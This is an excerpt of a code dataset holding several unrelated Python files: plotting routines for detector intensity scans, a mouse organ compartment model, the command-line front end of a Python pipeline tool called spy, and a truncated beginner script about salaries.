np.reshape(z, (steps, steps))\n prefix += 'absolute'\n\n # We need to take the transpose, otherwise we can't match the actually file position (x,y)\n z = z.T\n\n surf = ax.plot_surface(x, y, z, cmap=cm.viridis, linewidth=0, antialiased=False)\n ax.zaxis.set_major_locator(LinearLocator(10))\n\n ax.set_xticks(xx, minor=False)\n ax.set_yticks(yy, minor=False)\n\n ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))\n ax.set_xlabel('X position [mm]')\n ax.set_ylabel('Y position [mm]')\n # Add a color bar which maps values to colors.\n plt.xticks(rotation=10)\n plt.yticks(rotation=-10)\n if rel_label:\n plt.title('Relative Data : {}'.format(plot_name))\n fig.colorbar(surf, shrink=0.5, aspect=10, label='Relative Intensity [%]')\n else:\n plt.title('Relative Data : {}'.format(plot_name))\n fig.colorbar(surf, shrink=0.5, aspect=10, label='Intensity [nA]')\n\n plt.savefig('./Output/{}/{}_{}_3D.png'.format(folder, plot_name, prefix), bbox_inches='tight')\n plt.show()\n plt.clf()\n\n\ndef plot_intensity_contour(xo, xf, yo, yf, z, steps, path_to_file, rel_label):\n\n # folder and plot_name came from one component of a file list which is a string type, divided into 2 strings\n folder = path_to_file.split(\"/\")[0]\n filename = path_to_file.split(\"/\")[1]\n plot_name = filename.split('.')[0]\n\n fig, ax = plt.subplots()\n # Draw the contour plots from the relative max. intensity\n x = np.linspace(xo, xf, steps)\n y = np.linspace(yo, yf, steps)\n x, y = np.meshgrid(x, y)\n\n if rel_label:\n z = np.reshape(z, (steps, steps)) * np.array(100)\n else:\n z = np.reshape(z, (steps, steps))\n\n # We need to take the transpose, otherwise we can't match the actually file position (x,y)\n z = z.T\n\n cs_levels = 8\n cpf = ax.contourf(x, y, z, levels=cs_levels, cmap=cm.viridis)\n colours = ['w' if level < 0 else 'k' for level in cpf.levels]\n\n cs = ax.contour(x, y, z, levels=cs_levels, colors=colours, extent=[-15, 315, -15, 315])\n ax.set_aspect(aspect=1)\n ax.clabel(cs, inline=1, fontsize=10, colors=colours)\n ax.set_xticks(np.linspace(xo, xf, steps), minor=False)\n ax.set_yticks(np.linspace(yo, yf, steps), minor=False)\n\n plt.xlabel('x position [mm]')\n plt.ylabel('y position [mm]')\n plt.grid()\n\n if rel_label:\n plt.title('Relative Intensity : {}'.format(plot_name))\n fig.colorbar(cpf, cmap=cm.viridis, label='Relative Intensity [%]')\n plt.savefig('./Output/{}/{}_Contour_rel.png'.format(folder, plot_name), bbox_inches='tight')\n else:\n plt.title('Intensity : {}'.format(plot_name))\n fig.colorbar(cpf, cmap=cm.viridis, label='Intensity [nA]')\n plt.savefig('./Output/{}/{}_Contour.png'.format(folder, plot_name), bbox_inches='tight')\n\n plt.savefig('/Users/lonewolf/Desktop/{}_{}_Data_3D.png'.format(folder, plot_name), bbox_inches='tight')\n plt.show()\n plt.clf()\n\n\n\ndef plot_cells(dim_x, dim_y, xo, xf, yo, yf, steps):\n x = np.linspace(xo, xf, steps)\n y = np.linspace(yo, yf, steps)\n matrix_of_cells = (np.arange(0, dim_x * dim_y, 1)).reshape((dim_x, dim_y)).T\n\n # Drawing\n fig, ax = plt.subplots()\n ax = plt.gca()\n\n im = ax.imshow(matrix_of_cells, origin='lower', extent=[-15, 315, -15, 315])\n\n # Loop over data dimensions and create text annotations.\n for i, xx in enumerate(x):\n for j, yy in enumerate(y):\n text = ax.text(yy, xx, matrix_of_cells[i, j], ha=\"center\", va=\"center\", color=\"black\", size='6')\n\n fig.colorbar(im, ax=ax, label='Time [steps]')\n ax.set_xticks(np.linspace(xo, xf, steps))\n ax.set_yticks(np.linspace(xo, xf, steps))\n plt.xlabel('x position [mm]')\n plt.ylabel('y position [mm]')\n plt.title('Channels or cells in surface scan')\n plt.savefig('./Output/Others/Scanned_Surface.png', bbox_inches='tight')\n plt.show()\n plt.clf()\n\ndef plot_current_vs_channel(number_of_cell, current, current_std, path_to_file, color, rel_label):\n # folder and plot_name came from one component of a file list which is a string type, divided into 2 strings\n folder = path_to_file.split(\"/\")[0]\n filename = path_to_file.split(\"/\")[1]\n plot_name = filename.split('.')[0]\n\n cells = np.arange(0, number_of_cell, 1)\n\n if rel_label:\n string = 'relative'\n axis_label = 'Relative Intensity [%]'\n rel_current = current / np.max(current)\n error_ratio = current_std / current\n index_of_max = np.argmax(current)\n delta_rel_current = rel_current * np.sqrt(error_ratio ** 2 + error_ratio[index_of_max] ** 2)\n\n matrix = rel_current * 100\n matrix_std = delta_rel_current * np.abs(100)\n\n else:\n string = 'absolute'\n axis_label = 'Intensity [nA]'\n matrix = current\n matrix_std = current_std\n\n plt.plot(cells, matrix, 'k-', linewidth='0.5', color='black')\n plt.fill_between(cells, matrix - matrix_std, matrix + matrix_std, color=color)\n\n plt.ylabel(axis_label)\n plt.xlabel('Cell number')\n plt.title('{} : {}'.format(folder, plot_name))\n plt.savefig('./Output/{}/{}_{}_current_vs_channels.png'.format(folder, plot_name, string), bbox_inches='tight')\n plt.show()\n plt.clf()\n\ndef plot_mean_differences_current_vs_channel(number_of_cells, file_list, rel_label):\n\n # For the mean :\n cells = np.arange(0, number_of_cells, 1)\n current_matrix = np.zeros((number_of_cells, len(file_list)))\n current_std_matrix = np.zeros((number_of_cells, len(file_list)))\n\n for i, file in enumerate(file_list):\n x, y, current, current_std, timestamp = readout.read_file(file, 'space')\n\n # folder and plot_name came from one component of a file list which is a string type, divided into 2 strings\n folder = file.split(\"/\")[0]\n filename = file.split(\"/\")[1]\n plot_name = filename.split('.')[0]\n\n if rel_label:\n string = 'relative'\n axis_label = 'Relative Intensity [%]'\n rel_current = current / np.max(current)\n error_ratio = current_std / current\n index_of_max = np.argmax(current)\n delta_rel_current = rel_current * np.sqrt(error_ratio ** 2 + error_ratio[index_of_max] ** 2)\n\n current = rel_current * 100\n current_std = delta_rel_current * np.abs(100)\n\n else:\n string = 'absolute'\n axis_label = 'Intensity [nA]'\n\n current_matrix[:, i] = current\n current_std_matrix[:, i] = current_std\n\n plt.scatter(cells, current, linewidth='0.3', label=plot_name, color=xkcd_colors[i])\n del x, y, current, current_std, timestamp\n\n\n mean = current_matrix.mean(axis=1)\n mean_std = current_matrix.std(axis=1)\n\n plt.plot(cells, mean, 'k-', linewidth='0.5', label='mean of runs')\n plt.fill_between(cells, mean - mean_std, mean + mean_std, color=sns.xkcd_rgb['amber'])\n plt.legend(bbox_to_anchor=(0, 1.10, 1, 0.2), loc=\"lower left\", mode='expand', ncol=4, fontsize=8)\n\n plt.ylabel(axis_label)\n plt.xlabel('Cell number')\n plt.title('Pixel Stability : {}'.format(folder))\n plt.savefig('./Output/{}/all_{}_mean_current_vs_channels.png'.format(folder, string), bbox_inches='tight')\n plt.show()\n plt.clf()\n del string\n\n # For the differences :\n string = ''\n for i, file in enumerate(file_list):\n x, y, current, current_std, timestamp = readout.read_file(file, 'space')\n\n # folder and plot_name came from one component of a file list which is a string type, divided into 2 strings\n folder = file.split(\"/\")[0]\n filename = file.split(\"/\")[1]\n plot_name = filename.split('.')[0]\n\n if rel_label:\n string += 'relative'\n axis_label = 'Relative - not much meaning'\n rel_current = current / np.max(current)\n error_ratio = current_std / current\n index_of_max = np.argmax(current)\n delta_rel_current = rel_current * np.sqrt(error_ratio ** 2 + error_ratio[index_of_max] ** 2)\n\n current = rel_current * 100\n current_std = delta_rel_current * np.abs(100)\n\n else:\n string += 'absolute'\n axis_label = 'Relative Difference wrt Mean [%]'\n\n differences = ((mean - current) / mean) * np.array(100)\n plt.plot(cells, differences, 'k-', linewidth='1.', label=plot_name, color=xkcd_colors[i])\n\n plt.legend(bbox_to_anchor=(0, 1.10, 1, 0.2), loc=\"lower left\", mode='expand', ncol=4, fontsize=8)\n plt.ylabel(axis_label)\n plt.xlabel('Cell number')\n plt.title('Pixel Stability : {}'.format(folder))\n plt.savefig('./Output/{}/all_{}_differences_current_vs_channels.png'.format(folder, string), bbox_inches='tight')\n plt.show()\n plt.clf()\n\n\ndef plot_projections(xo, xf, yo, yf, current, current_std, steps, path_to_file, rel_label):\n # xo : beginning of X-axis\n # xf : end of X-axis\n # yo : beginning of Y-axis\n # yf : end of Y-axis\n # steps : number of measurements in along the axis X and Y (it should be equal in both axis)\n # path_to_file : path to the file as string type (usually a element of a file_list)\n # rel_label : Boolean (True : compute relative intensity wrt the maximum - False : just the absolute intensity)\n\n\n # folder and plot_name came from one component of a file list which is a string type, divided into 2 strings\n folder = path_to_file.split(\"/\")[0]\n filename = path_to_file.split(\"/\")[1]\n plot_name = filename.split('.')[0]\n\n x_axis = np.linspace(xo, xf, steps)\n y_axis = np.linspace(yo, yf, steps)\n\n string = ''\n\n if rel_label:\n string += 'relative'\n axis_label = 'Relative Intensity [%]'\n rel_current = current / np.max(current)\n error_ratio = current_std / current\n index_of_max = np.argmax(current)\n delta_rel_current = rel_current * np.sqrt(error_ratio**2 + error_ratio[index_of_max]**2)\n\n matrix = (np.reshape(rel_current, (steps, steps))).T * 100\n matrix_std = (np.reshape(delta_rel_current, (steps, steps))).T * np.abs(100)\n\n else:\n string += 'absolute'\n axis_label = 'Intensity [nA]'\n matrix = (np.reshape(current, (steps, steps))).T\n matrix_std = (np.reshape(current_std, (steps, steps))).T\n\n for i in range(len(x_axis)):\n plt.plot(x_axis, matrix[i, :], color='black', linewidth=0.5, marker='o', markerfacecolor='black', markersize=2)\n plt.fill_between(x_axis, matrix[i, :] - matrix_std[i, :], matrix[i, :] + matrix_std[i, :], color=xkcd_colors[i])\n #for j in range(len(y_axis)):\n # plt.annotate(np.around(matrix[i, j], decimals=2), ((x_axis[j]), matrix[i, j]))\n plt.title('{} : {} - X projection'.format(plot_name, folder))\n plt.xlabel('x axis [mm]')\n plt.ylabel(axis_label)\n plt.savefig('./Output/{}/{}_{}_Xproj.png'.format(folder, string, plot_name), bbox_inches='tight')\n plt.show()\n\n for j in range(len(y_axis)):\n plt.plot(y_axis, matrix[:, j], color='black', linewidth=0.5, marker='o', markerfacecolor='black', markersize=2)\n plt.fill_between(y_axis, matrix[:, j] - matrix_std[:, j], matrix[:, j] + matrix_std[:, j], color=xkcd_colors[j])\n #for i in range(len(x_axis)):\n # plt.annotate(np.around(matrix[j, i], decimals=2), ((y_axis[j]), matrix[j, i]))\n\n plt.title('{} : {} - Y projection'.format(plot_name, folder))\n plt.xlabel('y axis [mm]')\n plt.ylabel(axis_label)\n plt.savefig('./Output/{}/{}_{}_Yproj.png'.format(folder, string, plot_name), bbox_inches='tight')\n plt.show()\n plt.clf()\n\n\ndef plot_stability_in_time(file_list, rel_label):\n # file_list : list of file paths\n # rel_label : Boolean (True : compute relative intensity wrt the maximum - False : just the absolute intensity)\n\n\n fig, ax = plt.subplots()\n xfmt = md.DateFormatter('%Y/%m/%d %H:%M:%S')\n ax.xaxis.set_major_formatter(xfmt)\n\n\n for i, file in enumerate(file_list):\n # folder and plot_name came from one component of a file list which is a string type, divided into 2 strings\n folder = file.split(\"/\")[0]\n filename = file.split(\"/\")[1]\n plot_name = filename.split('.')[0]\n\n x, y, current, current_std, timestamp = readout.read_file(file, 'space')\n\n if rel_label:\n string = 'relative'\n axis_label = 'Relative Intensity [%]'\n rel_current = current / np.max(current)\n error_ratio = current_std / current\n index_of_max = np.argmax(current)\n delta_rel_current = rel_current * np.sqrt(error_ratio ** 2 + error_ratio[index_of_max] ** 2)\n\n rel_current *= np.array(100)\n delta_rel_current *= np.array(np.abs(100))\n\n current= rel_current\n current_std = delta_rel_current\n else:\n string = 'absolute'\n axis_label = 'Intensity [nA]'\n\n\n plt.plot(timestamp, current, 'k-', linewidth='0.5', label=plot_name, color=xkcd_colors[i])\n plt.fill_between(timestamp, current - current_std, current + current_std, color=xkcd_colors[i])\n\n del x, y, current, current_std, timestamp\n\n plt.ylabel(axis_label)\n plt.legend(bbox_to_anchor=(0, 1.10, 1, 0.2), loc=\"lower left\", mode='expand', ncol=4, fontsize=10)\n plt.xlabel('Time')\n plt.title('Intensity in time : {}'.format(folder))\n plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\", rotation_mode=\"anchor\")\n plt.savefig('./Output/{}/Current_in_Time_runs.png'.format(folder), bbox_inches='tight')\n plt.show()\n plt.clf()\n\n\ndef plot_projection_interpolation(xo, xf, current, current_std, steps, path_to_file, rel_label, which_axis):\n # xo : beginning of X-axis (or Y-axis)\n # xf : end of X-axis (or Y-axis)\n # steps : number of measurements in along the axis X and Y (it should be equal in both axis)\n # path_to_file : path to the file as string type (usually a element of a file_list)\n # rel_label : Boolean (True : compute relative intensity wrt the maximum - False : just the absolute intensity)\n # which_axis : Scanned axis, only two possible values: 'x' or 'y'\n\n radius = np.array(1.02) # m\n I_max = np.max(current) # nA\n list_of_off = []\n\n # folder and plot_name came from one component of a file list which is a string type, divided into 2 strings\n folder = path_to_file.split(\"/\")[0]\n filename = path_to_file.split(\"/\")[1]\n plot_name = filename.split('.')[0]\n\n if rel_label:\n string = 'proj_inter_relative'\n y_axis_label = 'Relative Intensity [%]'\n\n rel_current = current / np.max(current)\n error_ratio = current_std / current\n\n index_of_max = np.argmax(current)\n delta_rel_current = rel_current * np.sqrt(error_ratio ** 2 + error_ratio[index_of_max] ** 2)\n\n matrix = (np.reshape(rel_current, (steps, steps))).T * 100\n matrix_std = (np.reshape(delta_rel_current, (steps, steps))).T * np.abs(100)\n\n else:\n string = 'proj_inter_absolute'\n y_axis_label = 'Intensity [nA]'\n\n matrix = (np.reshape(current, (steps, steps))).T\n matrix_std = (np.reshape(current_std, (steps, steps))).T\n\n if which_axis == 'y':\n matrix = matrix\n matrix_std = matrix_std\n if which_axis == 'x':\n matrix = matrix.T\n matrix_std = matrix_std.T\n\n\n distance = (np.linspace(xo, xf, steps) / 1000)\n\n for i, position in enumerate(distance):\n # Fit function\n # Irradiance ~ cos^3 (angle)\n fitfunc = lambda p, x: (I_max / radius ** 2) * np.cos(p[0]*(np.arctan(x/radius - p[1]/radius)))**3 + p[2]\n # Distance to the target function\n errfunc = lambda p, x, y: fitfunc(p, x) - y\n\n # Initial guess for the parameters\n data_points = matrix[:, i]\n data_errors = matrix_std[:, i]\n\n initial_params = [np.pi , distance[np.argmax(data_points)], 2]\n params, success = optimize.leastsq(errfunc, initial_params[:], args=(distance, data_points))\n (freq, distance_off, shift) = params\n\n list_of_off.append(distance_off)\n\n\n # bigger list of angles to use in the interpolated function\n new_angles = np.linspace(distance.min(), distance.max(), 100)\n data_fitted = fitfunc(params, new_angles)\n fit_maximum = np.max(data_fitted)\n\n angles_fit = np.linspace(distance.min(), distance.max(), 100) - np.array(distance_off)\n angles_fit = np.arctan(angles_fit / radius)\n angles_fit = np.degrees(angles_fit)\n\n angles_data = np.arctan((distance - np.array(distance_off)) / radius)\n angles_data = np.degrees(angles_data)\n\n #print(params)\n\n fig, ay1 = plt.subplots()\n\n label = '$\\dfrac{I_{max}}{D_{flasher}^2}\\cos^3\\Theta $'\n\n x_axis_label = 'Scan position [mm]'\n axis_color = 'tab:blue'\n ay1.set_ylabel(y_axis_label)\n ay1.set_xlabel(x_axis_label, color=axis_color)\n ay1.tick_params(axis='x', labelcolor=axis_color)\n\n ay1.plot(distance*1000, data_points, label='Data')\n ay1.fill_between(distance*1000, data_points - data_errors, data_points + data_errors, color=sns.xkcd_rgb['yellow orange'])\n ay1.xaxis.set_ticks(distance*1000)\n ay1.plot()\n\n #for i, txt in enumerate(data_points):\n # ay1.annotate(np.around(txt, decimals=2), (distance[i]*1000, data_points[i]))\n\n\n ay2 = ay1.twiny()\n x_axis_label = '$\\Theta$ [$^\\circ$]'\n axis_color = 'tab:red'\n ay2.set_ylabel(y_axis_label)\n ay2.set_xlabel(x_axis_label, color=axis_color)\n ay2.tick_params(axis='x', labelcolor=axis_color)\n ay2.plot(angles_data, data_points, label='Data')\n ay2.plot(angles_fit, data_fitted, 'r--', label=label)\n\n plt.legend(bbox_to_anchor=(0, 0.0, 0.5, 0.20), loc=\"lower left\", mode='expand', ncol=1, fontsize=12)\n\n if which_axis == 'x':\n at_string = 'y'\n plt.text(0.60, 0.80, \"\"\"\n $x_{flasher}$ : %.1f mm\n $y$ : %.1f mm\n \"\"\" % (distance_off*1000, position*1000),\n fontsize=10, color='black', horizontalalignment='left', verticalalignment='bottom', transform=ay1.transAxes)\n if which_axis == 'y':\n at_string = 'x'\n plt.text(0.60, 0.80, \"\"\"\n $y_{flasher}$ : %.1f mm\n $x$ : %.1f mm\n \"\"\" % (distance_off * 1000, position*1000),\n fontsize=10, color='black', horizontalalignment='left', verticalalignment='bottom', transform=ay1.transAxes)\n\n\n figure_name = './Output/{}/{}_{}_{}_at_{}.png'.format(folder, plot_name, string, at_string, distance[i]*1000)\n plt.savefig(figure_name)\n plt.show()\n plt.clf()\n list_of_off = np.array(list_of_off) * np.array(1000)\n mean_of_off = np.average(list_of_off)\n return mean_of_off\n","sub_path":"doplots.py","file_name":"doplots.py","file_ext":"py","file_size_in_byte":27970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"648555297","text":"import numpy as np\n\nclass StateVar:\n\n\tdef __init__(self, name, initial_val=0):\n\t\tself.name = name\n\t\tself.value = initial_val\n\t\tself.ix = None\n\t\tself.d_dt = 0\n\t\tself.metabolic_fn = lambda x: 0\n\n\nclass OrganModel:\n\n\tdef __init__(self):\n\t\tself.state_vars = []\n\t\tself.flows = []\n\t\tself.input_fn = None\n\n\tdef add_var(self, state_var):\n\t\t# convert to StateVar obj if string\n\t\tif type(state_var) is str:\n\t\t\tstate_var = StateVar(state_var)\n\n\t\t# unique naming\n\t\tnames = [sv.name for sv in self.state_vars]\n\t\tif state_var.name in names:\n\t\t\traise ValueError('Variable named {} already exitsts.')\n\n\t\tself.state_vars.append(state_var)\n\t\tstate_var.ix = len(self.state_vars)-1\n\n\tdef get_var(self, name):\n\t\t# return StateVar obj by name\n\t\tfor sv in self.state_vars:\n\t\t\tif sv.name == name:\n\t\t\t\treturn sv\n\t\traise ValueError('No state_var named {}'.format(name))\n\n\tdef get_val(self,name):\n\t\treturn get_var(name).value\n\n\tdef add_flow(self, from_var, to_var, fn):\n\t\tflows = [set([f[0],f[1]]) for f in self.flows]\n\t\tset_flows = set([from_var, to_var])\n\n\t\t# make sure flow is not defined yet and is proper\n\t\tif set_flows in flows:\n\t\t\traise ValueError('Flow between {} already defined'.format(set_flows))\n\t\telif len(set_flows) == 1:\n\t\t\traise ValueError('Only one flow var defined')\n\n\t\t# check var names in flow\n\t\tfor f in set_flows:\n\t\t\tself.get_var(f)\n\n\t\tself.flows.append((from_var, to_var, fn))\n\n\tdef eval_derivative(self, at_state=None, t=None):\n\n\t\torig_state = self.get_state()\n\n\t\tself.set_state(at_state)\n\n\t\t# evaluate each flow term and sum them together\n\t\tfor from_name, to_name, fn in self.flows:\n\t\t\tfrom_var = self.get_var(from_name)\n\t\t\tto_var = self.get_var(to_name)\n\n\t\t\tfrom_var.d_dt = from_var.d_dt - fn(from_var.value)\n\t\t\tto_var.d_dt = to_var.d_dt + fn(from_var.value)\n\n\t\t# evaluate metabolic rate and add to d_dt\n\t\tfor sv in self.state_vars:\n\t\t\tsv.d_dt += sv.metabolic_fn(sv.value)\n\n\t\td_dt_vec = np.array([sv.d_dt for sv in self.state_vars])\n\n\t\tif (self.input_fn is not None) or (t is not None):\n\n\n\t\t\tif self.input_fn is None:\n\t\t\t\traise ValueError('t specified but no input_fn has been defined.')\n\n\t\t\td_dt_vec += self.input_fn(t)\n\n\n\t\t# reset d_dt to 0\n\t\tfor sv in self.state_vars:\n\t\t\tsv.d_dt = 0\n\n\t\t# reset state\n\t\tself.set_state(orig_state)\n\n\t\treturn d_dt_vec\n\n\n\n\tdef set_input_fn(self, input_fn):\n\t\t# should be vector fn corresponding to states\n\t\tself.input_fn = input_fn\n\n\tdef get_state(self):\n\t\treturn np.array([[sv.value] for sv in self.state_vars])\n\n\tdef set_state(self,state):\n\t\t# specify state to eval d_dt_vec or just use current state\n\t\tif state is not None:\n\n\t\t\tif len(state) != len(self.state_vars):\n\t\t\t\traise ValueError('Size of input vector does not match N states.')\n\n\t\t\tfor i, var in enumerate(self.state_vars):\n\t\t\t\tvar.value = state[i]\n\n\tdef get_derivative(self,t):\n\t\treturn np.array([[sv.eval_derivative() for sv in self.state_vars]]) + input_fn(t)\n\n\n\ndef real_mouse():\n\tmouse = OrganModel()\n\n\t# make state vars\n\tmouse.add_var('Venous Blood')\n\tmouse.add_var('Lung')\n\tmouse.add_var('Other Tissue')\n\t# mouse.add_var('Fat')\n\t# mouse.add_var('Bone')\n\t# mouse.add_var('Brain')\n\t# mouse.add_var('Heart')\n\t# mouse.add_var('Muscle')\n\t# mouse.add_var('Skin')\n\tmouse.add_var('Liver')\n\tmouse.add_var('Kidney')\n\tmouse.add_var('Gut')\n\tmouse.add_var('Spleen')\n\tmouse.add_var('Arterial Blood')\n\n\t# define all flows from https://www.sciencedirect.com/science/article/pii/S221138351630082X\n\n\n\td_art = .1\n\td_ven = .1\n\td_lung = .3\n\td_liv = .1\n\tmetab = -.05\n\n\t# venous flows\n\tmouse.add_flow('Venous Blood', 'Lung', lambda x: d_lung*x)\n\tmouse.add_flow('Other Tissue', 'Venous Blood', lambda x:d_ven*x)\n\t# mouse.add_flow('Fat', 'Venous Blood', lambda x: 1.0*x)\n\t# mouse.add_flow('Bone', 'Venous Blood', lambda x: 1.0*x)\n\t# mouse.add_flow('Brain', 'Venous Blood', lambda x: 1.0*x)\n\t# mouse.add_flow('Heart', 'Venous Blood', lambda x: 1.0*x)\n\t# mouse.add_flow('Muscle', 'Venous Blood', lambda x: 1.0*x)\n\t# mouse.add_flow('Skin', 'Venous Blood', lambda x: 1.0*x)\n\tmouse.add_flow('Liver', 'Venous Blood', lambda x: d_ven*x)\n\tmouse.add_flow('Kidney', 'Venous Blood', lambda x: d_ven*x)\n\n\t# arterial flows\n\tmouse.add_flow('Lung', 'Arterial Blood', lambda x: .01*d_lung*x)\n\tmouse.add_flow('Arterial Blood', 'Other Tissue', lambda x:d_art*x)\n\t# mouse.add_flow('Arterial Blood', 'Fat', lambda x: 1.0*x)\n\t# mouse.add_flow('Arterial Blood', 'Bone', lambda x: 1.0*x)\n\t# mouse.add_flow('Arterial Blood', 'Brain', lambda x: 1.0*x)\n\t# mouse.add_flow('Arterial Blood', 'Heart', lambda x: 1.0*x)\n\t# mouse.add_flow('Arterial Blood', 'Muscle', lambda x: 1.0*x)\n\t# mouse.add_flow('Arterial Blood', 'Skin', lambda x: 1.0*x)\n\tmouse.add_flow('Arterial Blood', 'Gut', lambda x: d_art*x)\n\tmouse.add_flow('Arterial Blood', 'Liver', lambda x: d_art*x)\n\tmouse.add_flow('Arterial Blood', 'Spleen', lambda x: d_art*x)\n\tmouse.add_flow('Arterial Blood', 'Kidney', lambda x: d_art*x)\n\n\t# other flows\n\tmouse.add_flow('Gut', 'Liver', lambda x: d_liv*x)\n\tmouse.add_flow('Spleen', 'Liver', lambda x: d_liv*x)\n\n\t# define metabolic rates\n\tmouse.get_var('Liver').metabolic_fn = lambda x: metab*x\n\tmouse.get_var('Kidney').metabolic_fn = lambda x: metab*x\n\n\n\treturn mouse\n\ndef simple_mouse():\n\n\tmouse = OrganModel()\n\n\t# make state vars\n\tmouse.add_var('Venous Blood')\n\tmouse.add_var('Lung')\n\tmouse.add_var('Other Tissue')\n\tmouse.add_var('Kidney')\n\tmouse.add_var('Spleen')\n\tmouse.add_var('Arterial Blood')\n\n\t# define all flows from https://www.sciencedirect.com/science/article/pii/S221138351630082X\n\n\n\td_art = .1\n\td_ven = .1\n\n\t# venous flows\n\tmouse.add_flow('Venous Blood', 'Lung', lambda x: 1.0*x)\n\tmouse.add_flow('Other Tissue', 'Venous Blood', lambda x:d_ven*x)\n\tmouse.add_flow('Kidney', 'Venous Blood', lambda x: d_ven*x)\n\n\t# arterial flows\n\tmouse.add_flow('Lung', 'Arterial Blood', lambda x: 1.0*x)\n\tmouse.add_flow('Arterial Blood', 'Other Tissue', lambda x:d_art*x)\n\tmouse.add_flow('Arterial Blood', 'Spleen', lambda x: d_art*x)\n\tmouse.add_flow('Arterial Blood', 'Kidney', lambda x: d_art*x)\n\n\tmouse.get_var('Kidney').metabolic_fn = lambda x: -0.5*x\n\n\n\treturn mouse\n\n\n\n","sub_path":"python_implementation/mouse_model.py","file_name":"mouse_model.py","file_ext":"py","file_size_in_byte":6018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"147217692","text":"import builtins\nimport functools\nimport importlib\nimport itertools\nimport sys\n\nfrom clize import Clize, run\nfrom clize.errors import MissingValue, UnknownOption\nfrom clize.parser import Parameter, NamedParameter\n\nfrom . import catcher, fragments\nfrom .decorators import decorators\nfrom .objects import Context, SpyFile, _ContextInjector\n\nimport spy\n\n\nPIPE_NAME = 'pipe'\n\n\nclass NullContext:\n def __enter__(self):\n pass\n def __exit__(self, typ, value, traceback):\n pass\n\n\ndef compile_(code, filename=''):\n try:\n return compile(code, filename, 'eval', 0, True, 0), True\n except SyntaxError:\n return compile(code, filename, 'exec', 0, True, 0), False\n\n\ndef make_callable(code, is_expr, env, pipe_name, debuginfo=(None, None)):\n local = env.view()\n local._spy_debuginfo = debuginfo\n proxy = local.overlay['spy'] = _ContextInjector(spy)\n if is_expr:\n def fragment_fn(value, context=None):\n local.overlay[pipe_name] = value\n proxy._ContextInjector__context = context\n return eval(code, env, local)\n else:\n def fragment_fn(value, context=None):\n local.overlay[pipe_name] = value\n proxy._ContextInjector__context = context\n eval(code, env, local)\n return local[pipe_name]\n fragment_fn._spy_debuginfo = debuginfo\n return fragment_fn\n\n\ndef make_context():\n context = Context()\n context.update(builtins.__dict__)\n return context\n\n\nclass _Decorated:\n def __init__(self, f, v, name):\n self.funcseq = f\n self.value = v\n self.name = name\n\n\nclass Decorator(NamedParameter):\n def __init__(self, *a, description, decfn, **kw):\n super().__init__(*a, **kw)\n self.description = description\n self.decfn = decfn\n\n def parse_one_arg(self, ba, arg):\n try:\n if arg[0:2] == '--':\n return [ba.sig.aliases[arg]]\n elif arg[0] == '-':\n return [ba.sig.aliases['-' + c] for c in arg[1:]]\n else:\n return arg\n except KeyError as e:\n raise UnknownOption(e.args[0])\n\n def read_argument(self, ba, i):\n src = None\n io = i\n funcseq = [self.decfn]\n names = [self.display_name]\n arg = ba.in_args[i]\n if arg[1] == '-':\n i += 1\n try:\n arg = ba.in_args[i]\n except:\n raise MissingValue\n else:\n if len(arg) >= 3:\n arg = '-' + arg[2:]\n else:\n i += 1\n try:\n arg = ba.in_args[i]\n except:\n raise MissingValue\n while True:\n narg = self.parse_one_arg(ba, arg)\n if isinstance(narg, list):\n for dec in narg:\n if not isinstance(dec, Decorator):\n raise MissingValue\n funcseq.append(dec.decfn)\n names.append(dec.display_name)\n elif isinstance(narg, str):\n src = narg\n break\n i += 1\n if i >= len(ba.in_args):\n raise MissingValue\n arg = ba.in_args[i]\n ba.skip = i - io\n funcseq.reverse()\n ba.args.append(_Decorated(funcseq, src, ' '.join(names)))\n\n\ndef _main(*steps,\n each_line: 'l' = False,\n start: (int, 's') = 0,\n end: (int, 'e') = None,\n pipe_name: Parameter.UNDOCUMENTED = PIPE_NAME,\n no_default_fragments: Parameter.UNDOCUMENTED = False,\n no_exception_handling: Parameter.UNDOCUMENTED = False,\n show_fragments: Parameter.UNDOCUMENTED = False):\n \"\"\"Run Python code.\n\n steps: At least one Python expression (or suite) to execute\n\n each_line: If specified, process lines as strings rather than all of stdin as a file\n\n start: Don't print before this result (zero-based)\n\n end: Stop after getting this result (zero-based)\n \"\"\"\n sys.setcheckinterval(10000)\n\n pipe_name = sys.intern(pipe_name)\n\n spy.context = context = make_context()\n\n step_src = steps\n steps = []\n for i, code in enumerate(step_src):\n fragment_name = 'Fragment {}'.format(i + 1)\n source = code\n if isinstance(code, _Decorated):\n source = '{} {!r}'.format(code.name, code.value)\n code, funcseq = code.value, code.funcseq\n else:\n funcseq = ()\n co, is_expr = compile_(code, filename=fragment_name)\n debuginfo = (fragment_name, source)\n ca = make_callable(co, is_expr, context, pipe_name, debuginfo)\n for fn in funcseq:\n try:\n ca = fn(ca, debuginfo=debuginfo)\n except TypeError:\n ca = fn(ca)\n steps.append(spy.fragment(ca))\n\n index_offset = 0\n\n if not no_default_fragments:\n steps.append(fragments.make_limit(start=start, end=end))\n steps.append(fragments.print)\n\n if each_line:\n steps.insert(0, fragments.many)\n index_offset -= 1\n\n chain = spy.chain(steps, index_offset=index_offset)\n data = [SpyFile(sys.stdin)]\n\n if show_fragments:\n print(chain.format())\n return\n\n if no_exception_handling:\n context = NullContext()\n else:\n context = catcher.handler(delete_all=True)\n\n with context:\n chain.run_to_exhaustion(data)\n\n_main = Clize(_main, extra=tuple(Decorator(aliases=fn.decorator_names,\n description=fn.decorator_help,\n decfn=fn)\n for fn in decorators))\n\ndef main():\n run(_main)\n","sub_path":"spy/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":5745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"44790357","text":"habitantes = 1\r\nsalario_total = 0\r\ntotal_filhos = 0\r\nacima_mil = 0\r\n\r\nfor i in range(100000000000):\r\n\r\n salario = int(input('Digite o salario do habitante: '))\r\n n_filhos = int(input('Digite o numero de filhos: '))\r\n n_parada = int(input('Digite 1 para adicionar outro habitante: '))\r\n if n_parada != 1:\r\n if salario > 1000:\r\n acima_mil += 1\r\n salario_total += salario\r\n media_salario = salario_total / habitantes\r\n total_filhos += n_filhos\r\n media_filhos = total_filhos / habitantes\r\n percentual = acima_mil * (100 / habitantes)\r\n break\r\n else:\r\n if salario > 1000:\r\n acima_mil += 1\r\n 